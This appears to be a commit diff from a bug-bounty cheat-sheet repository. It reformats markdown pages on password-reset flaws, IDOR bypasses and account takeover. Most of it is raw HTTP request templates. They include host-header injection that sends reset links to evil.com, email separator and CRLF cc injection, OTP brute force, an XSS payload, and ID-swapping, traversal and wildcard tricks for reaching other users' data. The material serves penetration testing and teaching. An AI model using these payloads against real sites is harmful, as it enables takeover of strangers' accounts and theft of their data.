-
Muhammad Daffa
committed
2 years ago
1 parent abd025fb
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
-
-
skipped 13 lines 14 14 POST /ForgotPass.php HTTP/1.1 15 15 Host: target.com 16 16 X-Forwarded-For : 127.0.0.1 17 - [...] 17 + ... 18 18 19 19 [email protected] 20 20 ``` skipped 2 lines 23 23 ``` 24 24 POST /ForgotPass.php HTTP/1.1 25 25 Host: target.com 26 - [...] 26 + ... 27 27 28 28 [email protected]%00 29 29 ``` skipped 3 lines 33 33 POST /ForgotPass.php HTTP/1.1 34 34 Host: target.com 35 35 Cookie: xxxxxxxxxx 36 - [...] 36 + ... 37 37 38 38 [email protected] 39 39 ``` skipped 2 lines 42 42 POST /ForgotPass.php HTTP/1.1 43 43 Host: target.com 44 44 Cookie: aaaaaaaaaaaaa 45 - [...] 45 + ... 46 46 47 47 [email protected] 48 48 ``` skipped 2 lines 51 51 ``` 52 52 POST /ForgotPass.php HTTP/1.1 53 53 Host: target.com 54 - [...] 54 + ... 55 55 56 56 [email protected] 57 57 ``` skipped 1 lines 59 59 ``` 60 60 POST /ForgotPass.php?random HTTP/1.1 61 61 Host: target.com 62 - [...] 62 + ... 63 63 64 64 [email protected] 65 65 ``` skipped 2 lines 68 68 ``` 69 69 POST /api/forgotpass HTTP/1.1 70 70 Host: target.com 71 - [...] 71 + ... 72 72 73 73 {"email":"[email protected]"} 74 74 ``` skipped 1 lines 76 76 ``` 77 77 POST /api/forgotpass HTTP/1.1 78 78 Host: target.com 79 - [...] 79 + ... 80 80 81 81 {"email":"[email protected] "} 82 82 ``` skipped 4 lines -
-
-
1 - ## Password Reset Flaws 1 + ## Forgot Password Functionality 2 2 3 3 ## Introduction 4 - Common security flaws in password reset functionality 4 + Some common bugs in the forgot password / reset password functionality 5 5 6 6 ## How to exploit 7 - 1. Parameter pollution in reset password 7 + 1. Parameter pollution 8 8 ``` 9 - POST /reset 10 - [...] 9 + POST /reset HTTP/1.1 10 + Host: target.com 11 + ... 12 + 11 13 [email protected]&[email protected] 12 14 ``` 13 15 14 16 2. Bruteforce the OTP code 15 17 ``` 16 - POST /reset 17 - [...] 18 + POST /reset HTTP/1.1 19 + Host: target.com 20 + ... 21 + 18 22 [email protected]&code=$123456$ 19 23 ``` 20 24 21 25 3. Host header Injection 22 26 ``` 23 - POST /reset 24 - Host: evil.com 25 - [...] 27 + POST /reset HTTP/1.1 28 + Host: target.com 29 + ... 30 + 26 31 [email protected] 27 32 ``` 33 + to 28 34 ``` 29 - POST /reset 35 + POST /reset HTTP/1.1 30 36 Host: target.com 31 37 X-Forwarded-Host: evil.com 32 - [...] 38 + ... 39 + 33 40 [email protected] 34 41 ``` 35 42 And the victim will receive the reset link with evil.com 36 43 37 44 4. Using separator in value of the parameter 38 45 ``` 39 - POST /reset 40 - [...] 46 + POST /reset HTTP/1.1 47 + Host: target.com 48 + ... 49 + 41 50 [email protected],[email protected] 42 51 ``` 43 52 ``` 44 - POST /reset 45 - [...] 53 + POST /reset HTTP/1.1 54 + Host: target.com 55 + ... 56 + 46 57 [email protected]%[email protected] 47 58 ``` 48 59 ``` 49 - POST /reset 50 - [...] 60 + POST /reset HTTP/1.1 61 + Host: target.com 62 + ... 63 + 51 64 [email protected]|[email protected] 52 65 ``` 53 66 ``` 54 - POST /reset 55 - [...] 67 + POST /reset HTTP/1.1 68 + Host: target.com 69 + ... 70 + 56 71 [email protected]%[email protected] 57 72 ``` 58 73 59 74 5. No domain in value of the paramter 60 75 ``` 61 - POST /reset 62 - [...] 76 + POST /reset HTTP/1.1 77 + Host: target.com 78 + ... 79 + 63 80 email=victim 64 81 ``` 65 82 66 83 6. No TLD in value of the parameter 67 84 ``` 68 - POST /reset 69 - [...] 85 + POST /reset HTTP/1.1 86 + Host: target.com 87 + ... 88 + 70 89 email=victim@mail 71 90 ``` 72 91 73 92 7. Using carbon copy 74 93 ``` 75 - POST /reset 76 - [...] 94 + POST /reset HTTP/1.1 95 + Host: target.com 96 + ... 97 + 77 98 [email protected]%0a%0dcc:[email protected] 78 99 ``` 79 100 80 101 8. If there is JSON data in body requests, add comma 81 102 ``` 82 - POST /newaccount 83 - [...] 103 + POST /newaccount HTTP/1.1 104 + Host: target.com 105 + ... 106 + 84 107 {"email":"[email protected]","[email protected]","token":"xxxxxxxxxx"} 85 108 ``` 86 109 skipped 3 lines 90 113 - Generated based on the email of the user 91 114 - Generated based on the name of the user 92 115 116 + 10. Try Cross-Site Scripting (XSS) in the form 117 + 118 + Sometimes the email is reflected in the forgot password page, try to use XSS payload 119 + ``` 120 + "<svg/onload=alert(1)>"@gmail.com 121 + ``` 93 122 ## References 94 123 * [anugrahsr](https://anugrahsr.github.io/posts/10-Password-reset-flaws/) 95 124 * [Frooti](https://twitter.com/HackerGautam/status/1502264873287569414) -
-
-
-
-
skipped 9 lines 10 10 ## How to exploit 11 11 1. Add parameters onto the endpoints for example, if there was 12 12 ``` 13 - GET /api/v1/getuser 14 - [...] 13 + GET /api/v1/getuser HTTP/1.1 14 + Host: example.com 15 + ... 15 16 ``` 16 17 Try this to bypass 17 18 ``` 18 - GET /api/v1/getuser?id=1234 19 - [...] 19 + GET /api/v1/getuser?id=1234 HTTP/1.1 20 + Host: example.com 21 + ... 20 22 ``` 21 23 22 24 2. HTTP Parameter pollution 23 25 ``` 24 - POST /api/get_profile 25 - [...] 26 + POST /api/get_profile HTTP/1.1 27 + Host: example.com 28 + ... 29 + 26 30 user_id=hacker_id&user_id=victim_id 27 31 ``` 28 32 29 33 3. Add .json to the endpoint 30 34 ``` 31 - GET /v2/GetData/1234 32 - [...] 35 + GET /v2/GetData/1234 HTTP/1.1 36 + Host: example.com 37 + ... 33 38 ``` 34 39 Try this to bypass 35 40 ``` 36 - GET /v2/GetData/1234.json 37 - [...] 41 + GET /v2/GetData/1234.json HTTP/1.1 42 + Host: example.com 43 + ... 38 44 ``` 39 45 40 46 4. Test on outdated API Versions 41 47 ``` 42 - POST /v2/GetData 43 - [...] 48 + POST /v2/GetData HTTP/1.1 49 + Host: example.com 50 + ... 51 + 44 52 id=123 45 53 ``` 46 54 Try this to bypass 47 55 ``` 48 - POST /v1/GetData 49 - [...] 56 + POST /v1/GetData HTTP/1.1 57 + Host: example.com 58 + ... 59 + 50 60 id=123 51 61 ``` 52 62 53 63 5. Wrap the ID with an array. 54 64 ``` 55 - POST /api/get_profile 56 - [...] 65 + POST /api/get_profile HTTP/1.1 66 + Host: example.com 67 + ... 68 + 57 69 {"user_id":111} 58 70 ``` 59 71 Try this to bypass 60 72 ``` 61 - POST /api/get_profile 62 - [...] 73 + POST /api/get_profile HTTP/1.1 74 + Host: example.com 75 + ... 76 + 63 77 {"id":[111]} 64 78 ``` 65 79 66 80 6. Wrap the ID with a JSON object 67 81 ``` 68 - POST /api/get_profile 69 - [...] 82 + POST /api/get_profile HTTP/1.1 83 + Host: example.com 84 + ... 85 + 70 86 {"user_id":111} 71 87 ``` 72 88 Try this to bypass 73 89 ``` 74 - POST /api/get_profile 75 - [...] 90 + POST /api/get_profile HTTP/1.1 91 + Host: example.com 92 + ... 93 + 76 94 {"user_id":{"user_id":111}} 77 95 ``` 78 96 79 97 7. JSON Parameter Pollution 80 98 ``` 81 - POST /api/get_profile 82 - [...] 99 + POST /api/get_profile HTTP/1.1 100 + Host: example.com 101 + ... 102 + 83 103 {"user_id":"hacker_id","user_id":"victim_id"} 84 104 ``` 85 105 86 106 8. Try decode the ID, if the ID encoded using md5,base64,etc 87 107 ``` 88 - GET /GetUser/dmljdGltQG1haWwuY29t 89 - [...] 108 + GET /GetUser/dmljdGltQG1haWwuY29t HTTP/1.1 109 + Host: example.com 110 + ... 90 111 ``` 91 112 dmljdGltQG1haWwuY29t => [email protected] 92 113 93 - 9. If the website using graphql, try to find IDOR using graphql! 114 + 9. If the website using GraphQL, try to find IDOR using GraphQL 94 115 ``` 95 - GET /graphql 96 - [...] 116 + GET /graphql HTTP/1.1 117 + Host: example.com 118 + ... 97 119 ``` 98 120 ``` 99 - GET /graphql.php?query= 100 - [...] 121 + GET /graphql.php?query= HTTP/1.1 122 + Host: example.com 123 + ... 101 124 ``` 102 125 103 126 10. MFLAC (Missing Function Level Access Control) 104 127 ``` 105 - GET /admin/profile 128 + GET /admin/profile HTTP/1.1 129 + Host: example.com 130 + ... 106 131 ``` 107 132 Try this to bypass 108 133 ``` 109 - GET /ADMIN/profile 134 + GET /ADMIN/profile HTTP/1.1 135 + Host: example.com 136 + ... 110 137 ``` 111 138 112 139 11. Try to swap uuid with number 113 140 ``` 114 - GET /file?id=90ri2-xozifke-29ikedaw0d 141 + GET /file?id=90ri2-xozifke-29ikedaw0d HTTP/1.1 142 + Host: example.com 143 + ... 115 144 ``` 116 145 Try this to bypass 117 146 ``` 118 147 GET /file?id=302 148 + Host: example.com 149 + ... 119 150 ``` 120 151 121 152 12. Change HTTP Method 122 153 ``` 123 - GET /api/v1/users/profile/111 154 + GET /api/v1/users/profile/111 HTTP/1.1 155 + Host: example.com 156 + ... 124 157 ``` 125 158 Try this to bypass 126 159 ``` 127 - POST /api/v1/users/profile/111 160 + POST /api/v1/users/profile/111 HTTP/1.1 161 + Host: example.com 162 + ... 128 163 ``` 129 164 130 165 13. Path traversal 131 166 ``` 132 - GET /api/v1/users/profile/victim_id 167 + GET /api/v1/users/profile/victim_id HTTP/1.1 168 + Host: example.com 169 + ... 133 170 ``` 134 171 Try this to bypass 135 172 ``` 136 - GET /api/v1/users/profile/my_id/../victim_id 173 + GET /api/v1/users/profile/my_id/../victim_id HTTP/1.1 174 + Host: example.com 175 + ... 137 176 ``` 138 177 139 - 14. Change request content type 178 + 14. Change request `Content-Type` 140 179 ``` 180 + GET /api/v1/users/1 HTTP/1.1 181 + Host: example.com 141 182 Content-type: application/xml 142 183 ``` 143 184 Try this to bypass 144 185 ``` 186 + GET /api/v1/users/2 HTTP/1.1 187 + Host: example.com 145 188 Content-type: application/json 146 189 ``` 147 190 148 191 15. Send wildcard instead of ID 149 192 ``` 150 - GET /api/users/111 193 + GET /api/users/111 HTTP/1.1 194 + Host: example.com 151 195 ``` 152 196 Try this to bypass 153 197 ``` 154 - GET /api/users/* 198 + GET /api/users/* HTTP/1.1 199 + Host: example.com 200 + ``` 201 + ``` 202 + GET /api/users/% HTTP/1.1 203 + Host: example.com 204 + ``` 205 + ``` 206 + GET /api/users/_ HTTP/1.1 207 + Host: example.com 155 208 ``` 156 - 209 + ``` 210 + GET /api/users/. HTTP/1.1 211 + Host: example.com 212 + ``` 157 213 16. Try google dorking to find new endpoint 158 214 159 215 ## References skipped 2 lines -
-
skipped 11 lines 12 12 13 13 2. Try re-sign up using same email 14 14 ``` 15 - POST /newaccount 16 - [...] 15 + POST /newaccount HTTP/1.1 16 + ... 17 17 [email protected]&password=1234 18 18 ``` 19 19 After sign up using victim email, try signup again but using different password 20 20 ``` 21 - POST /newaccount 22 - [...] 21 + POST /newaccount HTTP/1.1 22 + ... 23 23 [email protected]&password=hacked 24 24 ``` 25 25 skipped 15 lines 41 41 42 42 4. Chaining with IDOR, for example 43 43 ``` 44 - POST /changepassword.php 44 + POST /changepassword.php HTTP/1.1 45 45 Host: site.com 46 - [...] 46 + ... 47 47 userid=500&password=heked123 48 48 ``` 49 49 500 is an attacker ID and 501 is a victim ID, so we change the userid from attacker to victim ID skipped 7 lines -
-
-
Recon/Github Dorks.md Reconnaissance/Github Dorks.mdContent is identical
-
Recon/Google Dorks.md Reconnaissance/Google Dorks.mdContent is identical
-
Recon/Scope.md Reconnaissance/Scope.mdContent is identical
-
Recon/Shodan Dorks.md Reconnaissance/Shodan Dorks.mdContent is identical
-
-